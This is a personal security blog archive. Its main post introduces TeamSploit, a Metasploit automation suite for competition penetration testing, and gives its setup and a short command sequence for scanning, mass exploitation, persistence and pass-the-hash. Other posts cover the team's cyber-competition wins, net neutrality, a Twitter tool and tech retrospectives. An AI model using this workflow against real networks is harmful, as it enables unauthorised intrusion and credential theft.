Sunday, August 26, 2012

Maryland Cyber Challenge and Conference & Global CyberLympics: TeamSploit

This post is part of a five part series:  The Journey (Part 1), TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Description:

TeamSploit makes group-based penetration testing fun and easy, providing real-time collaboration and automation. TeamSploit is a suite of tools for the Metasploit Framework. TeamSploit should work with any MSF product (include, OpenSource, Express, or Pro).

Features Include:

  • Exploitation Automation
  • Automated Post-Exploitation
  • Information and Data Gathering
  • Session Sharing
  • Trojans and Trollware

TeamSploit's primary goal is to automate common penetration testing tasks, and provide access and information to fellow team members.

The Origin:

TeamSploit's origin actually begins before the Global CyberLympics (GCL), and before Team ICF took first place at the Maryland Cyber Challenge and Conference (MDC3).  The basis of TeamSploit was actually a result of our preparation for the Penetration Testing round of the MDC3.  At that point in time it wasn't even called TeamSploit, nor was it nearly as feature-filled, but the foundation was laid.

It is common knowledge that a penetration test entails a lot more than simply exploiting systems.  When someone hires a team to preform a penetration test, they are not hiring a group to wreak havoc on their infrastructure, but instead they are buying a report.  In fact, a great deal of a penetration tester's time is spent preparing, drafting, and organizing the final report that will be delivered to the client.  While at the time, we didn't know the specifics of the final round of the MDC3, we did know it would include report writing or some simulation of that aspect.

Enter Auto Post - a Metasploit Meterpreter Plugin I created to assist in the reporting aspect of a penetration test.  It was essentially a collection of post exploitation process and tasks one would manually complete.  It included other Meterpreter scripts and plugins and plenty of Windows commands, all with the goal of collecting a large amount of information about a system directly after exploitation.  Many believe that Post Exploitation is the harder stage of an attack, and I aimed to make that comment obsolete.  Auto Post would capture password hashes, obtain lists of running services, provide a comprehensive list of installed software, provide information on who is logged on to the system, network infrastructure information, and much more.  Auto Post also automated the process of maintaining access, another key step of an attack, ensuring we wouldn't lose access to our targets.  In all, when running this primitive, early version of TeamSploit, you found yourself with an exhaustive log file and persistent access for each target your successively compromised - all in an automated fashion.

Ultimately, we did utilize Auto Post in our journey to victory at the penetration testing finale of the MDC3.  After gaining access to all of the systems, we delved into the produced Auto Post logs and started generating the requested reports for the competition.  In the end, we won and were rushing away to Miami, where we honestly didn't have much use for Auto Post, but we did have use to persistent access to the systems.  So TeamSploit was officially born.  At this point it was little more than a configurable, template driven version of Auto Post, but it was well on its way to becoming what it is today.  TeamSploit was slowly evolving from a simple Meterpreter script to a collection of scripts, plugins, tools, and importantly, even more automation.  For our North American Championship, we used  TeamSploit to pass sessions to each other and manage our persistent access.  However, our journey didn't end in Miami and we needed to prepare for the World Finals.

As was discussed in the previous post of this series; we knew the long wait between the regional Championships and the World Finals would breed a large amount of development, tools, and automation from our various competitors.  It was during this window of time that TeamSploit grew into the product it is today.  Feature after feature was conjured, developed, and implemented.  The team practices became a breeding ground for novel ideas and tactics, and my development time became an orchestration to develop these new tactics and automate them as much as possible.  If it could be automated, our plan was to have it automated.  And let's be honest, it is possible to automate almost everything we do, so automated it would become.

Yet the World Finals of the GCL are not the end of the TeamSploit story.  In fact, it is just the beginning.  Today TeamSploit is still under active development.  More automation is added on a constant basis and the team and I still come up with ideas that are added regularly.

Setup:

Downloading and Installing TeamSploit is simple - as the project is hosted on Subversion at Source Forge.  To checkout the latest copy of TeamSploit, simply run the following command in a terminal:
svn checkout svn://svn.code.sf.net/p/teamsploit/code/trunk teamsploit
The next step is to properly configure TeamSploit for your given team and environment.  You'll find the configuration file in your newly created teamsploit directory - teamsploit.conf.  TeamSploit comes with a large comprehensive configuration file, I'm not going to go over the entire configuration file, but I'll hit the important points.

First things first, make sure you change the first configuration option:

#  Change this to a '1' (no qoutes) when you finish editing this file... 
TS_CONFIG=1

This ensures that you actually configure TeamSploit before attempting to run it the first time, saving you a great deal of headaches down the road.

Now you'll need to specify the interface you are using:

TS_MY_INT=eth0

Next you are going to want to configure the team database to which you are connecting.  Obviously someone needs to be running a database.  The team member who plans host the server simply needs to setup a PostgreSQL database and share the following information with you:

TS_DB_NAME=teamsploitdb 
TS_DB_HOST=192.168.1.100 
TS_DB_PORT=5432 
TS_DB_USER=teamsploit 
TS_DB_PASS=password
If a fellow teammate is running the MSFD service, you'll want to specify connection information for that as well:
TS_MSFD_CONNECT=1 
TS_MSFD_HOST=192.168.1.100 
TS_MSFD_PORT=51337
The final item you'll want to properly configure happens to be one of the most important.  The team mates and ports you'll be sharing sessions with:

TS_TEAM_MATES="192.168.1.101;192.168.1.102;192.168.1.103;193.168.1.104" 
TS_TEAM_PORT=1025 
TS_TEAM_PORT_2=7000 
TS_TEAM_PORT_HTTP=80 
TS_TEAM_PORT_HTTPS=443 
TS_TEAM_PORT_DNS=53
At this point, TeamSploit should be configured and ready for you to start using.

Usage:

Loading TeamSploit is as simply as running the TeamSploit executable in your teamsploit directory:
./teamsploit
Unless otherwise configured, TeamSploit is now going to load two windows (three if you are connecting to a MSFD Service):

TeamSploit Screenshot

Within your Primary shell, you can exploit systems and Auto Post Exploitation will complete - passing sessions to both your Listener as well as each of your team mates.

Within the Listener, you can interact with any sessions you've received, from both your own exploitation as well as sessions your fellow team mates have acquired.

TeamSploit actually loads a number of very useful modules, like:

At this point, you can compromise a target network with very little effort.  The very first thing you'll need to do is configure a Nessus policy to only audit exploits that have a corresponding Metasploit module.  You can follow the directions provided by Dark Operator if you'd like (Directions).

Connect TeamSploit to Nessus (be sure to replace the relevant details):
nessus_connect username:password@nessus_host:port ok
 Find your newly created Metasploit-Only Nessus Policy:
nessus_policy_list
Start a scan against your targets (be sure to replace the relevant details):
nessus_scan_new PolicyID "Scan Name" AddressRange 
You can monitor your scan with the following:
nessus_scan_status 
Once the scan is done, you'll need to import your results to TeamSploit (the Scan ID should have been returned when starting the scan):
nessus_report_get ScanID 
Now we are ready to exploit the systems:
vuln_exploit 
As each system is exploited, the Auto Post Exploitation will complete - sharing sessions with your listener and your team mates.  If during this time period you'd like to interact with your newly compromised systems, you can do so inside of your listener.

Now that all of the systems (with vulnerabilities returned by Nessus) have been compromised, it is time to pass the hash and see if we can obtain any more of our targets:
pass_the_hash 
At this point, all of the collected credentials will be used against all of the remaining targets.  With any luck, this will obtain you further access (especially with password reuse and Windows domains).

And that's it.  With only a few commands and a couple of minutes, we've successfully infiltrated a target network, obtained ingrained access, gathered a large amount of system information, and can now laugh at the System Administrators as they fight with the Trollware.


Video:

This demonstration shows the usage of TeamSploit from both the attackers (left window) and victims (right window) perspective.

The attacker on the left has a base installation of TeamSploit on BackTrack R3 and is targeting the administrator on the right. The premise of this scenario is the admin on the right hand side is completing typical daily administrative work and does not know an attacker is targeting their system.

Note: This video is based off of Revision 4 of TeamSploit



Thursday, August 9, 2012

Maryland Cyber Challenge and Conference & Global CyberLympics: The Journey

With the next season of the Maryland Cyber Challenge and Conference and the Global CyberLympics starting up, I am well overdue to write some posts about last season's adventure.  This will be a five part series:  The Journey (Part 1), TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Maryland Cyber Challenge and Conference (MDC3)


It all started with the MDC3, Maryland decided they wanted to cash in on the vast skill and experience they housed in the Baltimore-Washington DC Metropolitan Area, self-proclaiming to be the Silicon Valley of Information Security.  Working for one of the larger Information Security firms in the area, my employer and I were directly in the cross-hairs of MD - we were the target audience.

For the first time ever, my employer came to me to compete in a competition, instead of the other way around, a nice change in pace.  I was asked to participate as the team captain and build a team due to my previous competition experience, having competed in every single Mid-Atlantic Collegiate Cyber Defense Competition; for the first three years on the blue cell (defense) and the red cell (offense) since.

The team quickly came together, honestly I had some good candidates in mind already. Benjamin Heise was the first to get the offer, and was setup as the co-captain for the team.  I had worked with Ben for a few years, he was good, one of the best I know, and he had some experience with the CCDC already.  With Ben and I having extensive offensive experience, we needed some defensive folks, so I contacted Matthew Wines and Mark Reinsfelder.  Both were good friends of mine, and both worked with me, plus they had competed on both the defensive and offensive teams at the CCDC.  With the four of us, we already had a real powerhouse, stocked with plenty of previous competition experience.  But we needed two more players.  Enter Steve Collmann and Jesse Hudlow, both were new to the competition scene, but both really knew their stuff in their respective areas:  Steve Collmann would primarily focus on Windows Defense, and Jesse Hudlow would round out our Offense.  And so the team was born.

The MDC3 was a phased-based competition, each phase focused on a different arena of Information Security.  In total, we competed in three phases, the first two virtual and the last, in-person at the Conference.  Each virtual phase acted as a qualifier or elimination round, slowly dwindling the list of teams down until eight fought head-to-head at the in-person event.

The Phases:
  1. Computer Network Defense (CND)
  2. Forensics
  3. Penetration Test
The CND phase consisted of two virtual machine images, one Windows and one Linux.  Both were a bit dated, Windows 2000 and Red Hat 9.  We had six hours to secure the systems before they would be audited.  Having a good mixture of Windows and Linux experience on the team paid off, we split up and tackled both systems simultaneously.  We even used our vast offensive experience to do our own auditing and testing.  In the end, while the points were not revealed, we know we made it to the next round.

The Forensics round consisted of a single EnCase hard-drive image.  We were to take this image, preform the forensics analysis, and then deliver a detailed forensics report (Who, What, Where, When, Why, and How) within six hours.  Using a number of open source tools, we quickly found a number of items of interest:  encrypted and encoded data we deciphered, stenography we uncovered, deleted files we recovered, and plenty of logs.  The remainder of our time was spent drafting the detailed report.  It just goes to show that writing is a skill required in the information security field.  The point totals for the forensics round were not released, but after the round we learned we had indeed passed all of the qualifiers and would be competing in the final in-person event.

The Penetration Testing round was far different than the previous two rounds, primarily due to the fact that it was in-person and live.  We arrived at the Baltimore Convention Center to find a large competition area, furnished with equipment and plenty of camera crews.  We competed that day under the bright studio lamps, and hundreds of spectators passing through as they rushed to their next conference talk.  This event required us to obtain access to eleven different systems, plant a flag, and then write a detailed Penetration Testing report.  We were actually the first group to obtain access to all eleven systems; in fact, we were the first group to gain access to all eleven systems in the history of that environment.  The scores were broadcasted live to the spectators and we actually spent a great deal of time in second place.  During the last hour the scores were taken down and we just kept on keeping on.

We impatiently awaited the results at the award ceremony which took place at the conclusion of the conference.  We were confident, but certainly unsure.  Our Project Manager, who spectated for the day, looked as if he was going to faint at any moment.  As tradition, they announced the teams in descending order, starting at third.  When they announced that 'Team Pr3tty' had secured second place, we knew we had taken home the gold.  Barely, containing our excitement, we awaited our name to be called and our chance to walk on stage.

We joined the stage, shook hands, took pictures, and if you've seen any TV Game Shows you know how this next part goes - As we walk across the stage, the announcer says "And you're GOING TO MIAMI."  Dazed and confused is the only way to describe it.  We look down to our Project Manager as the announcer continues to explain that the first and second place team gets a seat at the North American Championship for the Global CyberLympics, tomorrow.

After much fanfare and endless phone calls, we get all of the approvals in check and headed home, for in less than twenty-four hours later, we would be on the plane headed to the GCL...

Global CyberLympics (GCL)


We skipped right past the qualifications and eliminations, directly to the big show, the North American Championship.

Unlike the MDC3, the GCL was a more traditional CTF event.  Each team had a number of systems they needed to defend against all the other teams.  Flags were replaced with "phoning home," a process which informs the scoring system you have access, and at which level.

We broke the team down into two groups:  Offense and Defense.  We had two primary players for each group, and two floaters, the team broke down as such:

  • Offensive Floater:  Me
  • Offensive Group:  Ben & Jesse
  • Defensive Floater:  Matt
  • Defensive Group:  Mark & Steve
The structure was simple, the dedicated defensive players would focus on defending our network and the dedicated offensive players would focus on attacking everyone else.  The floaters would stick to their primary designation, unless the other group needed assistance.

Right out of the gates, the offensive group gained and maintained access to just about every Windows box, and had most of the Linux boxes too.  This situation didn't really change much throughout the entire event.  We rarely lost access, and just slowly picked up the few stragglers here and there.  The defensive players played cat and mouse with the attackers all day.  It was a cake walk on the offensive side, but an all out grudge match on the defensive side.  The scoreboard was live until sometime late in the afternoon, although we were in first almost the entire time.

In the end we secured the title of North American Champions with almost seven times the offensive score of the second place team, but only a round's worth of points on the defensive side.  We won, no doubt, but the event was a real eye-opener into where our team needed the most work:  Defense.  After much celebration in Miami, we headed home, home to work, home to life, but also home to prepare...prepare for the World Finals.

The MDC3 and North American leg of the CyblerLympics took place in October; however, the World Finals weren't held for another five months in March of 2012.  We had plenty of time to plan and prepare.  Ben immediately started work on a Lab environment, filled with countless vulnerable images, and I quickly put together a scoring engine.  Between Ben and I, we created our own CTF in a box.  After which, the CTF team got together time and time again, and did full-on pedal to the metal events.  The offensive side would pumble the defensive side, and the defensive team would cry out in anger.  But slowly the defensive team was getting better and better.  I even devised a small training programming, consisting of a crawl, walk, run approach to under-fire windows defense.  All in all, our defensive side was really shaping up, and our offensive team was getting an itch, and itch to automate.

Knowing there was months before the World Finals, we knew people would code, script, and automate as much as possible.  The environment was going to be the same, everyone had already seen it.  In a lot of respects, the competitions came down to a ingenuity and/or coding competition.  As our defensive group got better, we started transitioning our focus to tool development.  If it could be automated, we were automating.

We worked on both offensive and defensive tools.  On the defensive side, we planned to have automated patchers, system monitoring, active response tools, and much more.  On the offensive side, we planned out automated exploitation, automated post exploitation, even tools to automate the flag steps (phoning home) and plenty of other treats.  In the end we really only came out with three viable products:  TeamSploit, Unsploitable, and Defensive Tools For The Blind.  I'll go into depth on each of these in the upcoming parts of the series, for now here is a quick description:

TeamSploitTeamSploit makes group-based penetration testing fun and easy, providing real-time collaboration and automation. TeamSploit is a suite of tools for the Metasploit Framework. TeamSploit should work with any MSF product (include, OpenSource, Express, or Pro).

UnsploitableUnsploitable is an emergency patcher, providing critical security patches and updates for commonly exploited vulnerabilities in common operating systems, services, and applications.

Defensive Tools For The BlindDefensive Tools For The Blind (DTFTB) is a collection of Windows and Linux tools that automate discovery of post exploitation, backdoors, and rouge access, for defenders. DTFTB allows a system defender to quickly and precisely locate common backdoor tendencies and system misconfigurations used by an attacker to maintain access.

In the end, we placed second in the World, against none other than Deloitte (one of the big four).  Trust me, you can't complain.  It was a wild journey, filled with fun and learning, what more could you ask for?

Here are some articles about our journey and accomplishments:

Keep an eye out for the upcoming parts of this series:  TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Monday, October 26, 2009

Regulations of Open Networks...say what?

I am all for open networks, applications, projects, etc.  I even strongly support FOSS software. In fact, every piece of code I personally write for public consumption is released under the GPLv2. (I'll look into v3 when it stabilizes a bit more; some of it is still too new for me to wage an accurate risk evaluation).  I have, of course, written stuff for myself (and that code holds a strong IP copyright) ... but if I were to release it, it would be OS.  Yet, even from a business standpoint, I would argue that FOSS is the way to go.  You become the free, defacto standard...and fsck people for support.  And then when you eventually fork a professional version that is more stable, has more updates, is more feature rich, and is more enterprise geared , those changes get backported to the FOSS version as time progresses and the pro version is further updated.  (Examples: Nessus, Snort, Wine, Red-Hat, etc.)

Now...with all of that said, we live (last I checked) in a capitalist economic society.  If you want to write software, platforms, firmware, etc. and charge for it, then so be it.  If you want to keep other people from manipulating it, then so be it.  More than likely, I will never personally use it or even support you -- but good luck to you anyway. With some smart marketing professionls (who then write "1x faster then the competition" on the package), you'll succeed either way.

Furthermore, I strongly disagree with patents on software.  Great...you've come up with an idea! Have a cookie and go make it happen!  Do it right, and you win!.  Software patents protect people/companies who suck at turning an idea into a solution.  Just because you had an idea doesn't mean that I shouldn't be able to implement it in my own way, for my own purposes, on my own terms.

Specifically concerning "Net Neutrality," there are currently two ideas of thought. The first feels that companies should be allowed to do as they choose. That is, they can block sites, customers, countries, applications, protocols, etc.  The feeling is that "they" run the network, so "they" make the call.  Conversely, the other line of thinking is that it should be open and that companies shouldn't be allowed to tell a customer how he/she can and should access some form of technology.

Consequently, I have never been one to support the government telling a company how to run a business.  I believe that if the company is doing it wrong, they'll figure that out at bankruptcy court.  At the same time, I don't think the companies have the right to tell you what to do in your own home. Thus, I am torn, really.

One thing I do know, though, is this: the side that is trying to keep things open is going about it ALL wrong.  Net Neutrality doesn't just cover corporations...it covers government bodies as well.  Every where I turn, someone else is pleading to the FCC to create laws to keep the Internet, networks, and technology from being infringed upon from both the government and the corporations.

HELLO? ?!? Did I miss something?  How do you enact a law prohibiting the enactment of other laws?  Do people not see that once the FCC gets involved (that is, once they get jurisdiction over this form), it will set a precedence and the very thing everyone wants them to protect WILL BE TAINTED?

Really.

Do I want my internet provider to tell me what I can and cannot do on the Internet?  No.

Do I want my government to tell me what I can and cannot do on the internet?  No.

Do I think the government should be protecting us from such infringement?  No!

Lets make it simple: If there is a telco out there blocking access, drop them and get another one.  Trust me, if they all close up, someone will step forward. OpenISP anyone?  Seriously though, we CAN vote with our wallets...and we should!  While some usage is already protected by law, there are fair use laws in place and laws protecting speech, etc.  Those should protect the majority of the issues.  The rest can be handled with our money.

Just think twice before you ask for more laws and regulations to protect us, it may be the very thing that hampers us...

Monday, October 19, 2009

twitter2rss: Turn Friends into Feeds


A New Twitter Tool:

This past weekend I worked on a new project idea I had stored in the back of my mind.  The project "twitter2rss" allows you to generate an OPML RSS feed list of all of the friends, for a particular twitter account.  In other words, you give it the username of a twitter user, and it gives you a list you can import into your feed reader.  The project is nothing elaborate, it is not supposed to be.  It is just a simple tool that allows you to create a feed list.

If you have any questions, comments, suggestions, or (hopefully not) complaints, leave them in the comments.

Why:

There are a few known use cases (based on my own uses, and that of a few friends).

  • RSS Feed Reader does not allow authenticated feeds (quickest way to get the "home" feed - an example Google Reader)
  • Twitter is blocked from the location, but you still wish to obtain the feed data through a web based reader
  • You are not a Twitter member, but wish to follow someone else's friends (lurkers)
I am sure there are other cases this tool may be useful, leave your own uses in the comments if you'd like.


Project Description:

twitter2rss will obtain all friends of a specified twitter account, and then create an OPML feed list. The feed list will contain all of the obtained friend's twitter RSS feeds, which can then be imported into any standard feed reader.

Project Links:

Project Page:  http://twitter2rss.sf.net (Just the default Source Forge Project Page)
Summary Page http://sourceforge.net/projects/twitter2rss/ (This is more then likely the one you want)
Downloads:  http://sourceforge.net/projects/twitter2rss/files/

Project SVN:

svn co https://twitter2rss.svn.sourceforge.net/svnroot/twitter2rss twitter2rss - Check out:  http://sourceforge.net/projects/twitter2rss/develop

Enjoy,
Justin

Saturday, October 17, 2009

As The Calendar Turns: A Brief Review of the 2009 Fiscal Year on the Information Highway

Wow...

Has it truly been over a year since my last blog post?  I know I am certainly not the most frequent (or even semi-frequent) blogger on the Internet, but could it really have been that long ago that I posted about twitter changes and talked about the amazing mobility I have with my Blackberry?  I guess it has indeed been a year or so since those posts were made.  Perhaps we should change all of that...start this fiscal year fresh with a post.  Of course, when you have been quiiet for a year (even though I've been active and vocal in plenty of other Internet outlets), where do you really start?  How about a blog post about what has changed in the past year?

You don't often get to read a post about the dramatic changes in the past year-mainly because people keep you current with frequent content, and partially because people are too busy to stop and count the bits.  But when you do pause for a moment and look back, it seems like just yesterday that CNN and Ashton Kutcher were fighting for the title of first user to have one-million Twitter followers and Opera was joining Twitter (with thousands of soccer moms following). What about all the great malware of this past fiscal year?  Are you still cleaning Conficker off your systems?  It feels like just yesterday we were coming out of one of the most high-tech elections of all time.  Time surely flies, so lets take a look at the highlights.

Twitter

I feel like Twitter receives too much coverage; yet, it may actually be the most promising and popular communication tool.  It really wouldn't be accurate to exclude the accomplishments of Twitter in such a post.  Going "main stream" is the dream of most Internet start-ups.  Not many complete such a task and certainly most do not have major news network coverage.  However, Twitter received such success late last year-with many news-breaking events.  It seemed that every time the news networks dropped the ball with a story, Twitter was right there to catch the opportunity.  And the people noticed - as did the media.  Spotting a prime opportunityl, they shortly jumped on the bandwagon thereafter, as well.

Moreover, the number of Twitter users continued to climb rapidly.  From housewives to teenage celebrities, everyone was joining Twitter.  Luckily for us avid geeks, the twittersphere is averaging itself out.  But it is still nice to acknowledge the great success that Twitter has come into...we should all take a moment and congratulate Twitter again for such a wonderful Web 2.0 story, and a wonderful product.


Now if I never read another post, comment, tweet, or article about Twitter, I'd be content.

Legal & Cyber Command


It was not too long ago that every time I changed the channel, I'd see another Air Force cyber command commercial.  That all was laid to rest when a national Cyber Command was forged.  This command will oversee the nation's information security infrastructure.  Along with this institution 's creation came a large amount of concern - both over network neutrality and national privacy.  While very little questions have been answered, it is fair to remind everyone that the entire project is still very much in the developmental stage.  One thing is for sure, our government is taking the security situation seriously.  Let's help facilitate such actions in any way that we, as the community, can!

Don't forget about the interesting Cyber Securtiy Act of 2009, though, which interestingly gives the President the power to "shut down" the Internet.  We haven't heard much about this recently. Maybe we should review the progress?

Conficker

Every once in a while, a large hype is cultivated around a security issue.  More often than not, this issue is far from the most pressing.  Many times, other larger issues will even coincide, time- wise, with this publicly-hyped threat.  Enter Conficker.  The April 1st malware of the year.  It seems that as of late, each new year brings a new malware (vapor-malware) that makes a run with a destruction date of April 1st.  Time after time, the mass media runs with such a half-cocked story.  Conficker is really no different. The malware did little harm overall.  Of course, the security community took the opportunity to further educate the general public.

While the infection didn't cause the end of the Internet as some would have hoped (or as others would have had you believe), it is quite interesting to note that even as recently as two weeks ago, there are still over 250 million active infections.  It begs the question: are hyped threats spread further through haphazard searches? Furthermore, are they funded increasingly by the adversaries due to their popularity?  Or are they simply more visible?  These are some questions that the community really needs to ponder - as there will be plenty more to come on April 1st...or so we all hope.

SMB2

Certainly every time you check your RSS feed, you read about another vulnerability. With the popularity of products, Microsoft is on the top of the offenders list. (We could discuss the reasons indefinitely and ad nauseaum, so lets just skip them for now).  However, not nearly as many are as profitable as the previous RPC/SMB related vulnerabilities.  They are a gem amongst the rough - depending upon your perspective.  This year brought us another such novelty: the SMB2 vulnerability.

One of the most fascinating components of this vulnerability lies not in the vulnerability itself, but instead, the timeline.  The vulnerability was originally released simply as a denial of service.  Some people in the industry proported that the vulnerability was further exploitable to control execution; others strongly opposed.  Microsoft released a statement indicating it was ONLY a denial of service.  The interesting story was really going on in the background, within the "underground" communities, where exploit code could be found that controlled execution - prompting this vulnerability to the remotely exploitable code execution category.  To add more fear to the atmosphere, it took over nine days before a private security company released information that they had developed a proof of concept that allowed remote code execution.  Only after these facts surfaced did Microsoft confirm the true risk of this vulnerability.  For the pentesters out there, this is one more trick we can keep up our sleeves,. For those system administrators, don't forget to patch your new installs.

Wave

It is almost unfair for me to mention this when attempting to review the past.  But bare in mind, we first heard of this new Google initiative in the previous year.  It seems that the party is really just starting with this one, and it may be too early to really review the progress.  However, there are some eerie similarities to past Google projects.  Take Gmail as an example. The project was also released as a closed-invitation beta.  Hype grew...and you had people literally buying invitations.  I am unsure how far the hype will spread with Google Wave, but certainly the potential is there.

People are outright begging for invitations.  It seems everyone is talking about the new collaboration tool, but almost no one has an account.  The number of original invitations was proportedly to number somewhere around 100,000.  I doubt that people will openly sell or buy invitations (it is certainly against the terms of service), but that is certainly not stopping the malware authors, spammers, and other Internet delinquents from jumping on the bandwagon.  I am making a prediction: I expect us to see more in this arena in the near future.  This will most certainly translate into a future blog post...it just depends upon how far the rabbit hole deepens.

Phones, Gadgets, and Toys

Apple, RIM, and Google have really taken the world by storm (no RIM pun intended) with the mobile phone market.  More electronic gadgets have been produced than we can even afford.  It seems that the average consumer is becoming more and more technically savvy, and more and more technology centric.  I would be remiss if I didn't include some of the outstanding leaps and bounds that the electronic markets have achieved.  The mobile world continues to become more integrated into the cyber world.  Only time will tell how far this path will lead.  Yet no matter which devices or companies you cherish, just remember: with collaboration comes great outcomes.  Enter some great electronic collaborations.  More and more manufacturers and technology companies are teaming together to bring us even more power and resources in a mobile world.

Collaboration

This brings me to my last point: collaboration.  Each year it seems that the technology communities unify more and more-helping to facilitate more opportunities.  Out of all of the great events and achievements of this past fiscal year, this, in my opinion, is the most profound.  More open standards are created and more collaboration is bred.  Hopefully, we can see this methodology continue to grow.

Open Ending

No fears...I purposely kept this post brief and open-ended.  I wanted to lightly highlight some of the key events in (fiscal year) 2009.  I certainly didn't cover every event...not even the major ones. But hopefully, this will remind you of some of the prominent issues and events we endured.  While the fiscal year is over, the calendar year is still ticking.  I hope to review some of these events and components again in the future and see some of the end results.  Please allow this post to remind you to take a pause every now and again, to look back and reflect on the stepping stones that have brought us to this point.  It is something that many of us take for granted.  Comments are always welcome. I hope we can spark some interesting conversation about the past events and project some lessons learned into the future.

Always,
Justin M. Wray

Friday, September 19, 2008

Twitter: Changes Afoot

Check out the new twitter design, looking great. This was my number-one complaint about twitter over the other micro-blogging services. It felt too myspace-ish, all that has changed.

Twitter Blog: Changes Afoot

Monday, September 8, 2008

Mobility, Part Two

In my previous article I spoke about Mobility. Having the ability to move freely and still have access to all of your data and services. More specifically I focused on Mobile devices and interfaces to our normally Desktop centric world. This time I will skim the surface of another form of Mobility: The Cloud.

Having the ability to go from one location/workstation to another, while still having access to your data, is an important hurdle to jump. Many business tackle this issue with "roaming profiles" and other shared resources. But what do you at home do when sharing a profile between, home, work, friends, and the library isn't an option? I'd assume you use an Application Service Provider.

Application Service Providers aren't any new concept, and Google is far from the first Company in invest time, money, and resources into the idea.

From Wikipedia: "In terms of their common goal of enabling customers to outsource specific computer applications so they can focus on their core competencies, ASPs may be regarded as the indirect descendants of the service bureaus of the 1960s and 1970s. In turn, those bureaus were trying to fulfill the vision of computing as a utility, which was first proposed by John McCarthy in a speech at MIT in 1961."

The idea is simple, you register for a service/application that is provided online. All of your information/data is stored on the providers servers. When you need to access the service/data you simple visit the website, and login, no matter your location.

I personally rely on cloud-based services as much as I rely on mobile applications. I have almost all of my email in Google's Gmail (either directly or through POP support or forwarding). I use the Google Calendar on a daily bases to help keep me on track, and update others of my whereabouts (when needed). Google Reader is a dream-come-true - one of the best readers available. Even this blog is an example of a Cloud based service I use. My list could continue, just as I am sure yours could. Even social-networks are a form of cloud computing.

I can easily go from my laptop at the airport, to the desktop at my house and never miss an article, re-read an email, or forget about an appointment. But better yet, when I am in an unfamiliar place (the library, public system, friends house) I still have access to the very same data, in the very same interface. Everything just works, no matter where you go.

The release of Google Chrome shows how important the concept is to Google. They are now developing a browser that works better with web-based applications. Mozilla has also taken a stab at this technology with WebRunner/Prism. Adobe has been working in the arena with Adobe Air.

As systems progress and we continue to see items that are mobile-centric (like the netbooks, iPhones, etc) this technology will progress. We will continue to move our storage off our of system hard-drives and into data centers.

I encourage everyone to try out some ASPs, and write back with your favorites.